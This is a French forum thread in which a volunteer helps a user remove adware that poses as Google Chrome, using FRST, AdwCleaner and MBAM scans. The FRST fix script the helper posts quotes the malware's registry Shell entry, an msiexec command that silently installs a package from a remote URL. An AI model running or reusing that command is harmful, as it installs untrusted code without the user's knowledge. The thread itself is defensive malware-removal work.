Impossible de supprimer Google Chrome
Résolu/Fermé
BardeZoulou
Messages postés
102
Date d'inscription
dimanche 7 juin 2015
Statut
Membre
Dernière intervention
21 février 2018
-
19 avril 2017 à 13:41
billmaxime Messages postés 50403 Date d'inscription dimanche 20 novembre 2011 Statut Contributeur Dernière intervention 22 novembre 2024 - 14 mai 2017 à 17:34
billmaxime Messages postés 50403 Date d'inscription dimanche 20 novembre 2011 Statut Contributeur Dernière intervention 22 novembre 2024 - 14 mai 2017 à 17:34
A voir également:
- Impossible de désinstaller chrome
- Desinstaller edge - Guide
- Désinstaller onedrive - Guide
- Désinstaller mcafee - Guide
- Desinstaller logiciel windows - Guide
- Désinstaller bing - Guide
32 réponses
farreneit
Messages postés
282
Date d'inscription
jeudi 5 juillet 2012
Statut
Membre
Dernière intervention
13 janvier 2023
10
19 avril 2017 à 13:44
19 avril 2017 à 13:44
Bonjour,
Que se passe-t-il si tu fais clique droit sur Chrome, puis "ouvrir l'emplacement du fichier" ?
Cordialement,
farreneit
Que se passe-t-il si tu fais clique droit sur Chrome, puis "ouvrir l'emplacement du fichier" ?
Cordialement,
farreneit
BardeZoulou
Messages postés
102
Date d'inscription
dimanche 7 juin 2015
Statut
Membre
Dernière intervention
21 février 2018
19 avril 2017 à 14:05
19 avril 2017 à 14:05
j'ai une petite fenêtre marquer problème de raccourci et que l'élément "chrome.exe" a été modifier ou déplacer et il me demande si je veut supprimer ce raccourci
farreneit
Messages postés
282
Date d'inscription
jeudi 5 juillet 2012
Statut
Membre
Dernière intervention
13 janvier 2023
10
19 avril 2017 à 14:29
19 avril 2017 à 14:29
et si tu double clique sur chrome pour le lancer ?
BardeZoulou
Messages postés
102
Date d'inscription
dimanche 7 juin 2015
Statut
Membre
Dernière intervention
21 février 2018
19 avril 2017 à 14:31
19 avril 2017 à 14:31
J'ai la même fenêtre quoi apparait, je comprend plus rien car hier et même toute a l'heure, je pouvais lancer Chrome et aller sur internet
farreneit
Messages postés
282
Date d'inscription
jeudi 5 juillet 2012
Statut
Membre
Dernière intervention
13 janvier 2023
10
19 avril 2017 à 14:32
19 avril 2017 à 14:32
Cela signifie que chrome est supprimé
farreneit
Messages postés
282
Date d'inscription
jeudi 5 juillet 2012
Statut
Membre
Dernière intervention
13 janvier 2023
10
19 avril 2017 à 14:33
19 avril 2017 à 14:33
L'icone que tu vois est seulement un raccourci, chrome n'est plus sur ton ordinateur.
Bonne fin de journée !
Bonne fin de journée !
BardeZoulou
Messages postés
102
Date d'inscription
dimanche 7 juin 2015
Statut
Membre
Dernière intervention
21 février 2018
19 avril 2017 à 14:34
19 avril 2017 à 14:34
merci beaucoup Farreniet. Bonne journée a toi aussi
farreneit
Messages postés
282
Date d'inscription
jeudi 5 juillet 2012
Statut
Membre
Dernière intervention
13 janvier 2023
10
19 avril 2017 à 14:41
19 avril 2017 à 14:41
Pense juste à marquer le post comme résolu.
BardeZoulou
Messages postés
102
Date d'inscription
dimanche 7 juin 2015
Statut
Membre
Dernière intervention
21 février 2018
20 avril 2017 à 21:12
20 avril 2017 à 21:12
bonsoir, en faite mon problème n'est pas résolu, ce soir le logiciel Chrome est revenu sur mon ordi alors que je l'est pas utiliser de toute la journée. L’icône est placer sur le bureau, ancré sur la barre de tache et dans le menu démarrer. Si j'essaye de le supprimer, il ne se trouve pas parmi les logiciels sur mon ordi et si je clique avec le bouton droit sur chrome pour ouvrir l'emplacement du fichier, il me donne ceci:
Ce PC >Acer (C:) > Program Files (x86) > Everbean > Application
Je sais plus quoi faire
Ce PC >Acer (C:) > Program Files (x86) > Everbean > Application
Je sais plus quoi faire
farreneit
Messages postés
282
Date d'inscription
jeudi 5 juillet 2012
Statut
Membre
Dernière intervention
13 janvier 2023
10
20 avril 2017 à 22:53
20 avril 2017 à 22:53
essaye de supprimer le dossier Everbean
Tu vas dans PC>C:>Programme files
Tu vas dans PC>C:>Programme files
BardeZoulou
Messages postés
102
Date d'inscription
dimanche 7 juin 2015
Statut
Membre
Dernière intervention
21 février 2018
20 avril 2017 à 22:55
20 avril 2017 à 22:55
Everbean, c'est google Chrome ou c'est un programme malveillant?
Si je le supprime, chrome va revenir sur mon ordi ou plus du tout?
Si je le supprime, chrome va revenir sur mon ordi ou plus du tout?
farreneit
Messages postés
282
Date d'inscription
jeudi 5 juillet 2012
Statut
Membre
Dernière intervention
13 janvier 2023
10
20 avril 2017 à 23:56
20 avril 2017 à 23:56
Everbean ce n'est pas chrome
Vous n’avez pas trouvé la réponse que vous recherchez ?
Posez votre question
BardeZoulou
Messages postés
102
Date d'inscription
dimanche 7 juin 2015
Statut
Membre
Dernière intervention
21 février 2018
23 avril 2017 à 20:38
23 avril 2017 à 20:38
Bonsoir, je voudrais savoir si quelqu'un aurais une solution a mon problème, merci beaucoup
BardeZoulou
Messages postés
102
Date d'inscription
dimanche 7 juin 2015
Statut
Membre
Dernière intervention
21 février 2018
24 avril 2017 à 23:29
24 avril 2017 à 23:29
Bonsoir, est ce que quelqu'un peu m'aider dans mon soucis car Chrome s'installe a chaque fois que je démarre mon ordi, je sais plus quoi faire
billmaxime
Messages postés
50403
Date d'inscription
dimanche 20 novembre 2011
Statut
Contributeur
Dernière intervention
22 novembre 2024
6 005
24 avril 2017 à 23:37
24 avril 2017 à 23:37
salut
ton pc est en 32 ou 64 bits?
@+
ton pc est en 32 ou 64 bits?
@+
BardeZoulou
Messages postés
102
Date d'inscription
dimanche 7 juin 2015
Statut
Membre
Dernière intervention
21 février 2018
24 avril 2017 à 23:40
24 avril 2017 à 23:40
mon PC est en 64 bits, Billmaxime
billmaxime
Messages postés
50403
Date d'inscription
dimanche 20 novembre 2011
Statut
Contributeur
Dernière intervention
22 novembre 2024
6 005
24 avril 2017 à 23:45
24 avril 2017 à 23:45
re
ok, télécharge FRST (de Fabar) sur ton bureau
https://www.commentcamarche.net/telecharger/securite/10729-frst-farbar-recovery-scan-tool-64-bits/
regarde le tutoriel pour l'utilisation
https://www.sosvirus.net/frst-de-farbar/
PS: coche la case "shorcut"
poste les 3 rapports (FRST, ADDITION, SHORCUT) via cjoint
https://www.commentcamarche.net/faq/29493-utiliser-cjoint-pour-heberger-des-fichiers
@+
ok, télécharge FRST (de Fabar) sur ton bureau
https://www.commentcamarche.net/telecharger/securite/10729-frst-farbar-recovery-scan-tool-64-bits/
regarde le tutoriel pour l'utilisation
https://www.sosvirus.net/frst-de-farbar/
PS: coche la case "shorcut"
poste les 3 rapports (FRST, ADDITION, SHORCUT) via cjoint
https://www.commentcamarche.net/faq/29493-utiliser-cjoint-pour-heberger-des-fichiers
@+
BardeZoulou
Messages postés
102
Date d'inscription
dimanche 7 juin 2015
Statut
Membre
Dernière intervention
21 février 2018
25 avril 2017 à 21:24
25 avril 2017 à 21:24
bonsoir, voila les 3 rapport générer par FRST:
ADDITION: https://www.cjoint.com/c/GDztvHNnuLX
FRST: https://www.cjoint.com/c/GDztw2hzCQX
SHORCUT: https://www.cjoint.com/c/GDztxEXz7nX
Depuis ce soir, j'arrive pas avoir Firefox comme navigateur par défaut, des que je le quitte et je le relance, cela me demande a chaque fois
ADDITION: https://www.cjoint.com/c/GDztvHNnuLX
FRST: https://www.cjoint.com/c/GDztw2hzCQX
SHORCUT: https://www.cjoint.com/c/GDztxEXz7nX
Depuis ce soir, j'arrive pas avoir Firefox comme navigateur par défaut, des que je le quitte et je le relance, cela me demande a chaque fois
billmaxime
Messages postés
50403
Date d'inscription
dimanche 20 novembre 2011
Statut
Contributeur
Dernière intervention
22 novembre 2024
6 005
Modifié le 26 avril 2017 à 02:02
Modifié le 26 avril 2017 à 02:02
re
1) crée 1 point de restauration (nomme le de ton prénom+la date par exemple)
pour accéder à la restauration système, clique sur l'explorateur de fichier dans la barre des tâches
dans la fenêtre qui s'ouvre, clique droit sur "ce pc" et choisi "propriété"
dans la fenêtre qui s'ouvre, clique sur "créer"
2) tu as des restes de Mcafee, télécharge l'outil de désinstallation sur ton bureau clique ici
exécute le en tant qu'administrateur (clic droit)
3) télécharge Adwcleaner sur ton bureau clique ici
exécute le en tant qu'administrateur (clic droit)
clique sur Analyser et quand le scan est terminé, clique sur Nettoyer
poste le rapport (Adwcleaner S0) via cjoint >> https://www.commentcamarche.net/faq/29493-utiliser-cjoint-pour-heberger-des-fichiers
PS: le rapport se trouve dans C:\Adwcleaner\Adwcleaner S0
4) tu as MBAM sur ton pc, fait 1 scan, supprime tout ce qu'il trouve et poste le rapport via cjoint
https://www.commentcamarche.net/faq/29493-utiliser-cjoint-pour-heberger-des-fichiers
PS: le rapport se trouve dans MBAM/Compre rendu/Compte rendu d'analyse+la date
si tu as des questions
@+
le taux de radiation est plus élevé au pôle emploi qu'à Tchernobyl
1) crée 1 point de restauration (nomme le de ton prénom+la date par exemple)
pour accéder à la restauration système, clique sur l'explorateur de fichier dans la barre des tâches
dans la fenêtre qui s'ouvre, clique droit sur "ce pc" et choisi "propriété"
dans la fenêtre qui s'ouvre, clique sur "créer"
2) tu as des restes de Mcafee, télécharge l'outil de désinstallation sur ton bureau clique ici
exécute le en tant qu'administrateur (clic droit)
3) télécharge Adwcleaner sur ton bureau clique ici
exécute le en tant qu'administrateur (clic droit)
clique sur Analyser et quand le scan est terminé, clique sur Nettoyer
poste le rapport (Adwcleaner S0) via cjoint >> https://www.commentcamarche.net/faq/29493-utiliser-cjoint-pour-heberger-des-fichiers
PS: le rapport se trouve dans C:\Adwcleaner\Adwcleaner S0
4) tu as MBAM sur ton pc, fait 1 scan, supprime tout ce qu'il trouve et poste le rapport via cjoint
https://www.commentcamarche.net/faq/29493-utiliser-cjoint-pour-heberger-des-fichiers
PS: le rapport se trouve dans MBAM/Compre rendu/Compte rendu d'analyse+la date
si tu as des questions
@+
le taux de radiation est plus élevé au pôle emploi qu'à Tchernobyl
BardeZoulou
Messages postés
102
Date d'inscription
dimanche 7 juin 2015
Statut
Membre
Dernière intervention
21 février 2018
26 avril 2017 à 11:57
26 avril 2017 à 11:57
bonjour, j'ai fait a la lettre les différents points que tu as dit Billmaxime, voila les rapports des deux logiciels:
Adwcleaner: https://www.cjoint.com/c/GDAj267tFPX
MBAM: https://www.cjoint.com/c/GDAj3N7KKuX
J'ai redemarer l'ordi juste aprés la dernière analyse mais quand je vais sur Firefox, il me demande a chaque fois si je veut le définir comme navigateur principal, a chaque fois, je marque oui et sa me compte pas car le mess revient a chaque fois
Adwcleaner: https://www.cjoint.com/c/GDAj267tFPX
MBAM: https://www.cjoint.com/c/GDAj3N7KKuX
J'ai redemarer l'ordi juste aprés la dernière analyse mais quand je vais sur Firefox, il me demande a chaque fois si je veut le définir comme navigateur principal, a chaque fois, je marque oui et sa me compte pas car le mess revient a chaque fois
billmaxime
Messages postés
50403
Date d'inscription
dimanche 20 novembre 2011
Statut
Contributeur
Dernière intervention
22 novembre 2024
6 005
26 avril 2017 à 23:20
26 avril 2017 à 23:20
re
pour Adwcleaner, tu as bien cliqué sur "nettoyer" après l'analyse?
le rapport que tu dois poster, c'est le "CO" et pas le "SO" comme j'avais demandé (excuse moi pour mon erreur)
tu peux me refaire 1 scan de diagnostic identique que le 1er avec FRST et me poster les 3 rapports via cjoint
FRST
ADDITION
SHORTCUT
merci
@+
pour Adwcleaner, tu as bien cliqué sur "nettoyer" après l'analyse?
le rapport que tu dois poster, c'est le "CO" et pas le "SO" comme j'avais demandé (excuse moi pour mon erreur)
tu peux me refaire 1 scan de diagnostic identique que le 1er avec FRST et me poster les 3 rapports via cjoint
FRST
ADDITION
SHORTCUT
merci
@+
BardeZoulou
Messages postés
102
Date d'inscription
dimanche 7 juin 2015
Statut
Membre
Dernière intervention
21 février 2018
27 avril 2017 à 11:16
27 avril 2017 à 11:16
bonjour, oui j'ai cliquer sur nettoyer après l'analyse.
Voila le bon rapport: https://www.cjoint.com/c/GDBjovIH35X
et voila les 3 rapport de FRST
FRST: https://www.cjoint.com/c/GDBjo6HnJnX
ADDITION: https://www.cjoint.com/c/GDBjpArpcZX
SHORTCUT: https://www.cjoint.com/c/GDBjqakZH1X
Voila le bon rapport: https://www.cjoint.com/c/GDBjovIH35X
et voila les 3 rapport de FRST
FRST: https://www.cjoint.com/c/GDBjo6HnJnX
ADDITION: https://www.cjoint.com/c/GDBjpArpcZX
SHORTCUT: https://www.cjoint.com/c/GDBjqakZH1X
billmaxime
Messages postés
50403
Date d'inscription
dimanche 20 novembre 2011
Statut
Contributeur
Dernière intervention
22 novembre 2024
6 005
28 avril 2017 à 00:16
28 avril 2017 à 00:16
salut
/!\Script uniquement pour cet ordinateur, à ne pas reproduire sur un autre ordinateur/!\
fait ceci:
ouvre le bloc-note
copie/colle le texte ci-dessous:
quand le texte est copié/collé, clique sur "fichier">>"enregistrer sous" et choisi le "bureau" dans la colonne de gauche
en bas de page, dans "nom de fichier", tape fixlist.txt et clique sur "enregistrer"
exécute FRST et clique sur "corriger/fix"
quand la correction sera terminée, un fichier texte apparaîtra, copie/colle le résultat dans ta prochaine réponse
PS: dit moi comment fonctionne le pc et si tu as encore des soucis
@+
/!\Script uniquement pour cet ordinateur, à ne pas reproduire sur un autre ordinateur/!\
fait ceci:
ouvre le bloc-note
copie/colle le texte ci-dessous:
CreateRestorePoint: CloseProcesses: HKU\S-1-5-21-2178201453-3891589226-2901520741-1001\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.tslznzq.com/?data=zDlkMj1SMTF8NTNSNdkxMdFxRkEdFUMyOWQYRTkyOWVWM8QYRF== /q URLSearchHook: HKU\S-1-5-21-2178201453-3891589226-2901520741-1001 - (Pas de nom) - {0EBBBE48-BAD4-4B4C-8E5A-516ABECAE064} - Pas de fichier SearchScopes: HKU\S-1-5-21-2178201453-3891589226-2901520741-1001 -> DefaultScope {E4B5C142-7ED2-48DC-B7C0-8F79C67BF04B} URL = SearchScopes: HKU\S-1-5-21-2178201453-3891589226-2901520741-1001 -> {85A60A59-D3D8-468F-B598-FB4393789EF4} URL = hxxps://www.google.fr/search?q={searchTerms} SearchScopes: HKU\S-1-5-21-2178201453-3891589226-2901520741-1001 -> {E4B5C142-7ED2-48DC-B7C0-8F79C67BF04B} URL = BHO: Pas de nom -> {B164E929-A1B6-4A06-B104-2CD0E90A88FF} -> Pas de fichier BHO-x32: Pas de nom -> {B164E929-A1B6-4A06-B104-2CD0E90A88FF} -> Pas de fichier S2 3DM; C:\Users\Fabien\AppData\Local\3DM\Kitty.dll [X] S2 AppleNotificationsSrv; C:\ProgramData\Software\Apple\Apps\Notification.dll [X] 2017-04-26 09:48 - 2017-04-26 09:49 - 08681520 _____ (McAfee, Inc.) C:\Users\Fabien\Desktop\MCPR.exe 2017-04-19 13:12 - 2017-04-19 13:12 - 00000000 ____D C:\Users\Fabien\AppData\Local\Google Shared C Run-time for x64 (HKLM\...\{EF79C448-6946-4D71-8134-03407888C054}) (Version: 10.0.0 - McAfee) Task: {18446FF2-4AED-40A7-B4DD-6C61EC6AF1A3} - \WPD\SqmUpload_S-1-5-21-2178201453-3891589226-2901520741-1001 -> Pas de fichier <==== ATTENTION Task: {F40A70AA-6112-46A7-8C9F-9FD76A3DD1AC} - \Microsoft\Windows\Setup\EOSNotify -> Pas de fichier <==== ATTENTION FirewallRules: [UDP Query User{C65AF9E1-E2C0-42B1-9829-B04964642748}C:\users\fabien\appdata\roaming\cacaoweb\cacaoweb.exe] => (Allow) C:\users\fabien\appdata\roaming\cacaoweb\cacaoweb.exe FirewallRules: [TCP Query User{79B21610-F33A-4E70-817A-26BE7C0CDFD0}C:\users\fabien\appdata\roaming\cacaoweb\cacaoweb.exe] => (Allow) C:\users\fabien\appdata\roaming\cacaoweb\cacaoweb.exe FirewallRules: [{536AA915-159B-44FC-B811-EC0793E98C83}] => (Allow) C:\Program Files\Common Files\mcafee\Platform\McSvcHost\McSvHost.exe FirewallRules: [{769E3446-00A5-42A8-B9D0-D84A88C828B1}] => (Allow) C:\Program Files\Common Files\mcafee\Platform\McSvcHost\McSvHost.exe FirewallRules: [{6B0FB796-BA8E-4291-B6CE-1CF9FE42219E}] => (Allow) C:\Program Files (x86)\Boxbob\Application\chrome.exe Shortcut: C:\Users\Fabien\Desktop\Jeux Xbox 360\Modio 5.lnk -> C:\Program Files (x86)\Modio 5\Modio.exe (Pas de fichier) EmptyTemp: Reboot:
quand le texte est copié/collé, clique sur "fichier">>"enregistrer sous" et choisi le "bureau" dans la colonne de gauche
en bas de page, dans "nom de fichier", tape fixlist.txt et clique sur "enregistrer"
exécute FRST et clique sur "corriger/fix"
quand la correction sera terminée, un fichier texte apparaîtra, copie/colle le résultat dans ta prochaine réponse
PS: dit moi comment fonctionne le pc et si tu as encore des soucis
@+
BardeZoulou
Messages postés
102
Date d'inscription
dimanche 7 juin 2015
Statut
Membre
Dernière intervention
21 février 2018
Modifié le 4 mai 2017 à 22:53
Modifié le 4 mai 2017 à 22:53
bonsoir, désoler de répondre que maintenant mais j'était pas chez moi, mais j'ai fait ce que tu as ma demander, voila le résultat:
https://www.cjoint.com/c/GEeuSq4AxLX
mon PC fonctionne comme d'habitude, windows defender demande a chaque démarrage d'analyser mon ordi, google chrome est revenu et quand je clique sur le bouton droit sur l'icone pour voir l'emplacement du fichier, c'est dans un dossier marquer Zoohair et aussi Firefox est en anglais maintenant et quand je le lance je tombe direct sur la page "Inme".
Sinon tout roule, mdr
https://www.cjoint.com/c/GEeuSq4AxLX
mon PC fonctionne comme d'habitude, windows defender demande a chaque démarrage d'analyser mon ordi, google chrome est revenu et quand je clique sur le bouton droit sur l'icone pour voir l'emplacement du fichier, c'est dans un dossier marquer Zoohair et aussi Firefox est en anglais maintenant et quand je le lance je tombe direct sur la page "Inme".
Sinon tout roule, mdr
billmaxime
Messages postés
50403
Date d'inscription
dimanche 20 novembre 2011
Statut
Contributeur
Dernière intervention
22 novembre 2024
6 005
Modifié le 5 mai 2017 à 19:19
Modifié le 5 mai 2017 à 19:19
re
change tous tes mots de passe, ils ont pu être volés
=====================
fait analyser ce fichier sur VirusTotal et poste le lien de l'url dans ta prochaine réponse
C:\WINDOWS\IsUn040c.exe
le lien pour VirusTotal >> https://www.virustotal.com/gui/
=====================
mon PC fonctionne comme d'habitude, windows defender demande a chaque démarrage d'analyser mon ordi
fait 1 scan "rapide" avec Windows Defender
=====================
google chrome est revenu et quand je clique sur le bouton droit sur l'icone pour voir l'emplacement du fichier, c'est dans un dossier marquer Zoohair
supprime le manuellement si tu as accès au fichier
=====================
Firefox est en anglais maintenant et quand je le lance je tombe direct sur la page "Inme".
lance Firefox et dans la barre du navigateur, copie/colle
dana la fenêtre qui s'ouvre, clique sur "réparer Firefox"
quand les manipulations seront réalisées, dit moi comment va le pc
@+
le taux de radiation est plus élevé au pôle emploi qu'à Tchernobyl
change tous tes mots de passe, ils ont pu être volés
=====================
fait analyser ce fichier sur VirusTotal et poste le lien de l'url dans ta prochaine réponse
C:\WINDOWS\IsUn040c.exe
le lien pour VirusTotal >> https://www.virustotal.com/gui/
=====================
mon PC fonctionne comme d'habitude, windows defender demande a chaque démarrage d'analyser mon ordi
fait 1 scan "rapide" avec Windows Defender
=====================
google chrome est revenu et quand je clique sur le bouton droit sur l'icone pour voir l'emplacement du fichier, c'est dans un dossier marquer Zoohair
supprime le manuellement si tu as accès au fichier
=====================
Firefox est en anglais maintenant et quand je le lance je tombe direct sur la page "Inme".
lance Firefox et dans la barre du navigateur, copie/colle
about:supportet clique sur "enter"
dana la fenêtre qui s'ouvre, clique sur "réparer Firefox"
quand les manipulations seront réalisées, dit moi comment va le pc
@+
le taux de radiation est plus élevé au pôle emploi qu'à Tchernobyl
BardeZoulou
Messages postés
102
Date d'inscription
dimanche 7 juin 2015
Statut
Membre
Dernière intervention
21 février 2018
6 mai 2017 à 18:14
6 mai 2017 à 18:14
bonjour,
Pour les mots de passes, ils sont enregistrer sur mon ordi car je me souvient pas de certain mot de passe, alors je les enregistre dans firefox.
1- Pour l'analyse sur virustotal, voila le lien: https://www.virustotal.com/gui/file/aecc4933623ac8a4a09c80b796e04cd9418ecef86fa6bbea562acba4e2decd65
2- Pour le scan rapide de windows defender, il me trouve aucune menace sur mon ordi
3- J'ai supprimer manuellement le dossier, mais maintenant, j'ai un nouveau programme qui c'est installer sur mon ordi, c'est un jeu du nom de Big Farm, si je clique bouton droit dessus pour l'emplacement du fichier, cela me donne directement sur Firefox
4- Je fait la méthode que tu ma dit mais j'ai pas de bouton marquer réparer Firefox, j'ai juste un bouton marquer "Restart with Add-ons disable", si je le fait et que je retourne dans about: support, j'ai rien du tout
Je sais plus quoi faire maintenant
Pour les mots de passes, ils sont enregistrer sur mon ordi car je me souvient pas de certain mot de passe, alors je les enregistre dans firefox.
1- Pour l'analyse sur virustotal, voila le lien: https://www.virustotal.com/gui/file/aecc4933623ac8a4a09c80b796e04cd9418ecef86fa6bbea562acba4e2decd65
2- Pour le scan rapide de windows defender, il me trouve aucune menace sur mon ordi
3- J'ai supprimer manuellement le dossier, mais maintenant, j'ai un nouveau programme qui c'est installer sur mon ordi, c'est un jeu du nom de Big Farm, si je clique bouton droit dessus pour l'emplacement du fichier, cela me donne directement sur Firefox
4- Je fait la méthode que tu ma dit mais j'ai pas de bouton marquer réparer Firefox, j'ai juste un bouton marquer "Restart with Add-ons disable", si je le fait et que je retourne dans about: support, j'ai rien du tout
Je sais plus quoi faire maintenant
billmaxime
Messages postés
50403
Date d'inscription
dimanche 20 novembre 2011
Statut
Contributeur
Dernière intervention
22 novembre 2024
6 005
Modifié le 6 mai 2017 à 19:00
Modifié le 6 mai 2017 à 19:00
salut
Pour les mots de passes, ils sont enregistrer sur mon ordi car je me souvient pas de certain mot de passe, alors je les enregistre dans firefox.
dans cette page, clique sur "Afficher et supprimer les mots de passe" et note les sur 1 bout de papier
https://support.mozilla.org/fr/kb/gestionnaire-mots-passe
Pour le scan rapide de windows defender, il me trouve aucune menace sur mon ordi
ok, et ce message "windows defender demande a chaque démarrage d'analyser mon ordi" apparaît toujours?
J'ai supprimer manuellement le dossier, mais maintenant, j'ai un nouveau programme qui c'est installer sur mon ordi, c'est un jeu du nom de Big Farm, si je clique bouton droit dessus pour l'emplacement du fichier, cela me donne directement sur Firefox
regarde si tu peux le supprimer manuellement dans programmes et fonctionnalités du panneau de configuration
Je fait la méthode que tu ma dit mais j'ai pas de bouton marquer réparer Firefox, j'ai juste un bouton marquer "Restart with Add-ons disable", si je le fait et que je retourne dans about: support, j'ai rien du tout
regarde sur cette page pour remettre Firefox en Français
https://www.commentcamarche.net/faq/17148-repasser-firefox-en-francais
dit moi ce que ça donne, et comment le pc fonctionne
@+
le taux de radiation est plus élevé au pôle emploi qu'à Tchernobyl
Pour les mots de passes, ils sont enregistrer sur mon ordi car je me souvient pas de certain mot de passe, alors je les enregistre dans firefox.
dans cette page, clique sur "Afficher et supprimer les mots de passe" et note les sur 1 bout de papier
https://support.mozilla.org/fr/kb/gestionnaire-mots-passe
Pour le scan rapide de windows defender, il me trouve aucune menace sur mon ordi
ok, et ce message "windows defender demande a chaque démarrage d'analyser mon ordi" apparaît toujours?
J'ai supprimer manuellement le dossier, mais maintenant, j'ai un nouveau programme qui c'est installer sur mon ordi, c'est un jeu du nom de Big Farm, si je clique bouton droit dessus pour l'emplacement du fichier, cela me donne directement sur Firefox
regarde si tu peux le supprimer manuellement dans programmes et fonctionnalités du panneau de configuration
Je fait la méthode que tu ma dit mais j'ai pas de bouton marquer réparer Firefox, j'ai juste un bouton marquer "Restart with Add-ons disable", si je le fait et que je retourne dans about: support, j'ai rien du tout
regarde sur cette page pour remettre Firefox en Français
https://www.commentcamarche.net/faq/17148-repasser-firefox-en-francais
dit moi ce que ça donne, et comment le pc fonctionne
@+
le taux de radiation est plus élevé au pôle emploi qu'à Tchernobyl
BardeZoulou
Messages postés
102
Date d'inscription
dimanche 7 juin 2015
Statut
Membre
Dernière intervention
21 février 2018
7 mai 2017 à 18:54
7 mai 2017 à 18:54
Bonjour,
pour windows defender, cela ne le fait pas tout le temps, de temps en temps
Pour le jeu, je peut pas le supprimer dans programme et fonctionnalité, je sais pas comment le supprimer, il n'apparait nul part. Pour Firefox, j'ai essayer la méthode que tu as donner mais sa na pas marcher, j'ai toujours en anglais, j'ai essayer de le supprimer depuis "programme et fonctionalité" sa l'a enlever de la liste mais il c'est pas supprimer de l'ordi, il est toujours la et je peut l'utiliser, je sais plus quoi faire.
pour windows defender, cela ne le fait pas tout le temps, de temps en temps
Pour le jeu, je peut pas le supprimer dans programme et fonctionnalité, je sais pas comment le supprimer, il n'apparait nul part. Pour Firefox, j'ai essayer la méthode que tu as donner mais sa na pas marcher, j'ai toujours en anglais, j'ai essayer de le supprimer depuis "programme et fonctionalité" sa l'a enlever de la liste mais il c'est pas supprimer de l'ordi, il est toujours la et je peut l'utiliser, je sais plus quoi faire.
billmaxime
Messages postés
50403
Date d'inscription
dimanche 20 novembre 2011
Statut
Contributeur
Dernière intervention
22 novembre 2024
6 005
7 mai 2017 à 18:58
7 mai 2017 à 18:58
re
tu as oublié de "récupérer" tes mots de passe
dans cette page, clique sur "Afficher et supprimer les mots de passe" et note les sur 1 bout de papier
https://support.mozilla.org/fr/kb/gestionnaire-mots-passe
quand c'est fait, refait 1 scan de diagnostic avec FRST et poste les 3 rapports via cjoint
FRST
ADDITION
SHORTCUT
merci
@+
tu as oublié de "récupérer" tes mots de passe
dans cette page, clique sur "Afficher et supprimer les mots de passe" et note les sur 1 bout de papier
https://support.mozilla.org/fr/kb/gestionnaire-mots-passe
quand c'est fait, refait 1 scan de diagnostic avec FRST et poste les 3 rapports via cjoint
FRST
ADDITION
SHORTCUT
merci
@+
BardeZoulou
Messages postés
102
Date d'inscription
dimanche 7 juin 2015
Statut
Membre
Dernière intervention
21 février 2018
7 mai 2017 à 20:08
7 mai 2017 à 20:08
voila mes mots de passes sont supprimer de l'ordi et voici les 3 rapports:
FRST: https://www.cjoint.com/c/GEhsg10n1HX
ADDITION: https://www.cjoint.com/c/GEhshCN0WeX
SHORTCUT: https://www.cjoint.com/c/GEhsia1k3CX
FRST: https://www.cjoint.com/c/GEhsg10n1HX
ADDITION: https://www.cjoint.com/c/GEhshCN0WeX
SHORTCUT: https://www.cjoint.com/c/GEhsia1k3CX
billmaxime
Messages postés
50403
Date d'inscription
dimanche 20 novembre 2011
Statut
Contributeur
Dernière intervention
22 novembre 2024
6 005
7 mai 2017 à 20:10
7 mai 2017 à 20:10
re
voila mes mots de passes sont supprimer de l'ordi et voici les 3 rapports:
tu devais les changer, et les noter sur 1 carnet (par exemple)...
je vais lire les rapports
@+
voila mes mots de passes sont supprimer de l'ordi et voici les 3 rapports:
tu devais les changer, et les noter sur 1 carnet (par exemple)...
je vais lire les rapports
@+
billmaxime
Messages postés
50403
Date d'inscription
dimanche 20 novembre 2011
Statut
Contributeur
Dernière intervention
22 novembre 2024
6 005
Modifié le 7 mai 2017 à 21:16
Modifié le 7 mai 2017 à 21:16
re
pendant que je lis les rapports, fait analyser ces fichiers (en gras)sur VirusTotal et copie/colle les URL dans ta prochaine réponse
le lien pour VirusTotal >> https://www.virustotal.com/gui/
R2 BIT; C:\ProgramData\BIT\BIT.dll [1857536 2017-05-04] (windows) [Fichier non signé]
R2 IISvr; C:\ProgramData\Package Cache\{59399776-575D-9C54-E861-0D5EAB7E707D}v10.1.14393.795\Installers\IIS\iisexp.dll [105472 2017-05-04] () [Fichier non signé]
C:\WINDOWS\System32\Tasks\Windows-PG
C:\Users\Fabien\AppData\Roaming\WPVXAP.setting
@+
le taux de radiation est plus élevé au pôle emploi qu'à Tchernobyl
pendant que je lis les rapports, fait analyser ces fichiers (en gras)sur VirusTotal et copie/colle les URL dans ta prochaine réponse
le lien pour VirusTotal >> https://www.virustotal.com/gui/
R2 BIT; C:\ProgramData\BIT\BIT.dll [1857536 2017-05-04] (windows) [Fichier non signé]
R2 IISvr; C:\ProgramData\Package Cache\{59399776-575D-9C54-E861-0D5EAB7E707D}v10.1.14393.795\Installers\IIS\iisexp.dll [105472 2017-05-04] () [Fichier non signé]
C:\WINDOWS\System32\Tasks\Windows-PG
C:\Users\Fabien\AppData\Roaming\WPVXAP.setting
@+
le taux de radiation est plus élevé au pôle emploi qu'à Tchernobyl
BardeZoulou
Messages postés
102
Date d'inscription
dimanche 7 juin 2015
Statut
Membre
Dernière intervention
21 février 2018
7 mai 2017 à 22:04
7 mai 2017 à 22:04
j'ai analyser les ficher demander, voila les liens:
BIT.DLL: https://www.virustotal.com/gui/file/b0b6bed493f4f7eb7bc3103743372dc870170fe04f956c000e5bccd81b3071f3
IISEXP.DLL: https://www.virustotal.com/gui/file/eb2ce4fea12f7522b52564d381096209b5e889a1aa89fa3ab6ddd7e2c994b759
Mais pour windows-PG et WPVXAP.setting, je les trouve pas dans la recherche de fichier même en copiant collant le chemin, sa me dit que Windows ne parvient pas a trouver
BIT.DLL: https://www.virustotal.com/gui/file/b0b6bed493f4f7eb7bc3103743372dc870170fe04f956c000e5bccd81b3071f3
IISEXP.DLL: https://www.virustotal.com/gui/file/eb2ce4fea12f7522b52564d381096209b5e889a1aa89fa3ab6ddd7e2c994b759
Mais pour windows-PG et WPVXAP.setting, je les trouve pas dans la recherche de fichier même en copiant collant le chemin, sa me dit que Windows ne parvient pas a trouver
billmaxime
Messages postés
50403
Date d'inscription
dimanche 20 novembre 2011
Statut
Contributeur
Dernière intervention
22 novembre 2024
6 005
7 mai 2017 à 22:12
7 mai 2017 à 22:12
re
Mais pour windows-PG et WPVXAP.setting, je les trouve pas dans la recherche de fichier même en copiant collant le chemin, sa me dit que Windows ne parvient pas a trouver
ok, je fais le script et je reviens
@+
